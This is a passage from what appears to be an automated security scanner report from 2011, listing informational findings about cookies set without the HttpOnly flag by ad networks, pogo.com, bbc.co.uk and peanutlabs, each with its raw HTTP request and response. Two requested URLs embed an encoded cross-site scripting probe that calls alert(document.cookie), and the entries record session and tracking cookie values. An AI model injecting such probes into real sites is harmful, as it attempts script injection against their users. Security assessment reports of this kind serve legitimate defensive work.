HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
10.42. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6670-15.js |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- ruid=154d290e46adc1d
6f373dd09^2^1294537835 ^2915161843; expires=Sat, 09-Apr-2011 01:50:35 GMT; max-age=7776000; path=/; domain=.rubiconproject .com; - rsid=FcGERCD9s4JUW
/TrcU4Dz61qa66Y1k1ir e2YJBmN8SN4G8GheDmUS J4NHOc49cA03rZJzx16p B3UdIwsGOQ/PP8TzZUxG DmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject .com; - rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject
.com - csi15=3188204.js^2
^1294536315^1294537835; expires=Sun, 16-Jan-2011 01:50:35 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6670-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com/home Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:50:35 GMT Server: RAS/1.3 (Unix) P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: ruid=154d290e46adc1d Set-Cookie: rsid=FcGERCD9s4JUW Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:50:35 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=108564; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^2 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
10.43. http://optimized-by.rubiconproject.com/a/4252/4762/6942-15.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-15.js |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- ruid=154d290e46adc1d
6f373dd09^3^1294539219 ^2915161843; expires=Sat, 09-Apr-2011 02:13:39 GMT; max-age=7776000; path=/; domain=.rubiconproject .com; - rsid=FcGERCD9s4JUW
/TrcU4Dz61qa66Y1k1ir e2YJBmN8SN4G8GheDmUS J4NHOc49cA03rZJzx16p B3UdIwsGOQ/PP8TzZUxG DmBad2r6N25AKxdPo9e; path=/; domain=.rubiconproject .com; - rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject
.com - csi15=3188204.js^3
^1294536315^1294539219; expires=Sun, 16-Jan-2011 02:13:39 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6942-15.js Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://board-games.pogo Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: put_1523=MDo0lVW4JKD |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:13:39 GMT Server: RAS/1.3 (Unix) P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: ruid=154d290e46adc1d Set-Cookie: rsid=FcGERCD9s4JUW Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:13:39 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses15=4762^4; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=107180; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^3 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3188204" ...[SNIP]... |
10.44. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://optimized-by |
Path: | /a/4252/4762/6942-2.js |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject
.com - ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject
.com - csi2=3146355.js^1
^1294536507^1294536507; expires=Sun, 16-Jan-2011 01:28:27 GMT; max-age=604800; path=/; domain=.rubiconproject .com;
Request
GET /a/4252/4762/6942-2.js?cb Host: optimized-by.rubicon Proxy-Connection: keep-alive Referer: http://www.pogo.com Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ruid=154d290e46adc1d |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:28:27 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=60; path=/; domain=.rubiconproject Set-Cookie: rdk2=0; expires=Sun, 09-Jan-2011 02:28:27 GMT; max-age=10; path=/; domain=.rubiconproject Set-Cookie: ses2=4762^1; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=109892; path=/; domain=.rubiconproject P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi2=3146355.js^1 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2368 rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document window.rubicon_ad = "3146355" ...[SNIP]... |
10.45. http://puzzle-games.pogo.com/ previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | / |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=1A57DDA503E
2C81056979F24457357BF .000128; Domain=.pogo.com; Path=/ - com.pogo.unid=660623
0932049839; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:46 GMT; Path=/
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=1A57DDA503E Content-Language: en-US Set-Cookie: com.pogo.unid=660623 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:46 GMT Server: Apache-Coyote/1.1 |
10.46. http://puzzle-games.pogo.com/games/bejeweled2 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/bejeweled2 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=EADAF0FD321
8310E1CEEBA781854D80D .000146; Domain=.pogo.com; Path=/ - com.pogo.unid=660657
0234467613; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:50 GMT; Path=/
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=EADAF0FD321 Content-Language: en-US Set-Cookie: com.pogo.unid=660657 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:49 GMT Server: Apache-Coyote/1.1 |
10.47. http://puzzle-games.pogo.com/games/yahtzee-party previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://puzzle-games.pogo |
Path: | /games/yahtzee-party |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- prod.JID=E4AF788ED2A
A6227ABE9A8C3F56D31D0 .000290; Domain=.pogo.com; Path=/ - com.pogo.unid=660651
8694853812; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:25:49 GMT; Path=/
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 302 Moved Temporarily Expires: 0 Cache-Control: max-age=0, private Set-Cookie: prod.JID=E4AF788ED2A Content-Language: en-US Set-Cookie: com.pogo.unid=660651 Location: http://puzzle-games.pogo Content-Type: text/html;charset=UTF-8 Content-Length: 0 Date: Sun, 09 Jan 2011 02:25:49 GMT Server: Apache-Coyote/1.1 |
10.48. http://r.turn.com/server/pixel.htm previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r.turn.com |
Path: | /server/pixel.htm |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined |
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
10.49. http://r1.ace.advertising.com/click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /click/site=0000758630 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- C2=3yRKNJpwIg02FlBCd
bdRZA7gHw8jGHgsjhADg aUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ - 52607936=_4d290f90
,0846642328,758630^906164 ^1^0,0_; domain=advertising.com; path=/click - 0846642328=_4d290f90
,0846642328,758630^906164 ^1^0,1_; domain=advertising.com; path=/click
Request
GET /click/site=0000758630 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90 |
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCd Set-Cookie: 52607936=_4d290f90 Set-Cookie: 0846642328=_4d290f90 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href="%2f%3bord </body></html> |
10.50. http://r1.ace.advertising.com/site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=755399/size=300250 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- F1=BUBFp0kAAAAAHb4CA
EAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - BASE=YnQIx9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqQBlyv1AitvC52k1WF! ; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - ROLL=v5Q2Q0cRVUyqcZa
/vGc3WhvkMxIiWOS7HgfCaOA! ; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ - 72318651=_4d291415
,1206372681,755399^944664 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=755399/size=300250 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.944664.755399 Set-Cookie: F1=BUBFp0kAAAAAHb4CA Set-Cookie: BASE=YnQIx9MmSf Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa Set-Cookie: 72318651=_4d291415 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047 document.write('<iframe src="http://view.atdmt ...[SNIP]... |
10.51. http://r1.ace.advertising.com/site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=758630/size=160600 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- C2=Q+QKNJpwIg02FwBCd
bdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - F1=BA5Dp0EBAAAABAAAA
EAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - BASE=YnQIy9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ - ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/
- 52607936=_4d290f90
,0846642328,758630^906164 ^1^0,0_; domain=advertising.com; path=/click
Request
GET /site=758630/size=160600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.906164.758630 Set-Cookie: C2=Q+QKNJpwIg02FwBCd Set-Cookie: F1=BA5Dp0EBAAAABAAAA Set-Cookie: BASE=YnQIy9MmSf Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595 document.write('<SCRIPT language=\'JavaScript1.1\ ...[SNIP]... |
10.52. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=777340/size=300600 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- C2=wPRKNJpwIg02FtBCd
bdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - F1=BA/Ep0EBAAAABAAAA
IAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - BASE=YnQIz9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - ROLL=v5Q2W0cRVUyqcZa
/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ - 17871065=_4d2913f0
,4120808867,777340^955433 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=777340/size=300600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.955433.777340 Set-Cookie: C2=wPRKNJpwIg02FtBCd Set-Cookie: F1=BA/Ep0EBAAAABAAAA Set-Cookie: BASE=YnQIz9MmSf Set-Cookie: ROLL=v5Q2W0cRVUyqcZa Set-Cookie: 17871065=_4d2913f0 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579 document.write('<HTML>') ...[SNIP]... |
10.53. http://r1.ace.advertising.com/site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://r1.ace.advertising |
Path: | /site=777340/size=300600 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- C2=UQRKNJpwIg02FAHCd
bdBwB7gHw8jGPgsjhADg a0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - F1=BQBFp0EBAAAABAAAA
MAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - BASE=YnQIw9MmSf
+Tkd8dWtCeW84rjjGaJl mHvEh5gB4KT4ggqyea2eW /3YWKVm/y2YMyTPzWzWq PEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - ROLL=v5Q2X0cRVUyqcZa
/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ - 49979532=_4d291414
,0737842127,777340^949895 ^1183^0,0_; domain=advertising.com; path=/click
Request
GET /site=777340/size=300600 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ACID=Bc330012940999670074 |
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising Comscore: CMXID=2115.949895.777340 Set-Cookie: C2=UQRKNJpwIg02FAHCd Set-Cookie: F1=BQBFp0EBAAAABAAAA Set-Cookie: BASE=YnQIw9MmSf Set-Cookie: ROLL=v5Q2X0cRVUyqcZa Set-Cookie: 49979532=_4d291414 Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047 document.write('<iframe src="http://view.atdmt ...[SNIP]... |
10.54. http://www.bbc.co.uk/news/technology-12126880 previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bbc.co.uk |
Path: | /news/technology-12126880 |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- BBC-UID=048d5239a181
39fc2bddb11a61903f97 169352767050f19f02f9 f6849e4a283c0Mozilla%2f4 %2e0%20%28compatible%3b %20MSIE%207%2e0%3b %20Windows%20NT%206%2e0 %29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk; - BBC-UID=048d5239a181
39fc2bddb11a61903f97 169352767050f19f02f9 f6849e4a283c0Mozilla%2f4 %2e0%20%28compatible%3b %20MSIE%207%2e0%3b %20Windows%20NT%206%2e0 %29; expires=Mon, 09-Jan-12 01:38:36 GMT; path=/; domain=bbc.co.uk;
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: max-age=0 Content-Type: text/html Date: Sun, 09 Jan 2011 01:38:36 GMT Keep-Alive: timeout=10, max=797 Expires: Sun, 09 Jan 2011 01:38:36 GMT Connection: close Set-Cookie: BBC-UID=048d5239a181 Set-Cookie: BBC-UID=048d5239a181 Content-Length: 58551 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp <html xmlns="http://www.w3.org ...[SNIP]... |
10.55. http://www.e00.peanutlabs.com/IMG/parent_company.logo_url_medium.80x200.1.1248929690.jpg previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /IMG/parent_company.logo |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- AWSELB=052955471CE77
557C5059B093FDB80564 CA14D6917E97B67B5A5E 4D3EB1494CA107BC4756 C9D1E7917A75869111F0 EAA4A056867F2254F716 FAB6B9BD336486E7AB4FDD4D1 ;MAX-AGE=600
Request
GET /IMG/parent_company.logo Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.e00.peanutlabs Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=3jamnj3v5l |
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800, public Cache-control: no-cache="set-cookie" Content-Type: image/jpeg Date: Sun, 09 Jan 2011 01:30:24 GMT ETag: "7e878-3a36-4749170d611c0 Expires: Thu, 15 Apr 2020 20:00:00 GMT Last-Modified: Sun, 27 Sep 2009 16:11:59 GMT Server: Apache Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 14902 ......JFIF............. ...C..................... ...[SNIP]... |
10.56. http://www.e00.peanutlabs.com/favicon.ico previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /favicon.ico |
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:- AWSELB=052955471CE77
557C5059B093FDB80564 CA14D691772F16F2083B C8247835042071AB0E5E E05720064753CC7EA313 DAFB2493BDCE9D100F77 91BFE5D631D63157368D3863F ;MAX-AGE=600
Request
GET /favicon.ico HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pl_lang=en_US; __utmz=184043431 |
Response
HTTP/1.1 200 OK Accept-Ranges: bytes Cache-Control: max-age=604800, public Cache-control: no-cache="set-cookie" Content-Type: image/x-icon Date: Sun, 09 Jan 2011 02:50:08 GMT ETag: "b404ae-13e-495d459dde063 Expires: Thu, 15 Apr 2020 20:00:00 GMT Last-Modified: Wed, 24 Nov 2010 22:53:00 GMT Server: Apache Set-Cookie: AWSELB=052955471CE77 Vary: Accept-Encoding,User Connection: keep-alive Content-Length: 318 ..............(.......(.. ...[SNIP]... |
10.57. http://www.e00.peanutlabs.com/js/iFrame/index.php previous next
Summary
Severity: | Information |
Confidence: | Certain |
Host: | http://www.e00.peanutlabs |
Path: | /js/iFrame/index.php |
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:- dob=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
- sex=deleted; expires=Sat, 09-Jan-2010 01:30:20 GMT; path=/; domain=.peanutlabs.com
- pl_email=deleted; expires=Sat, 09-Jan-2010 01:30:21 GMT; path=/; domain=.peanutlabs.com
- AWSELB=052955471CE77
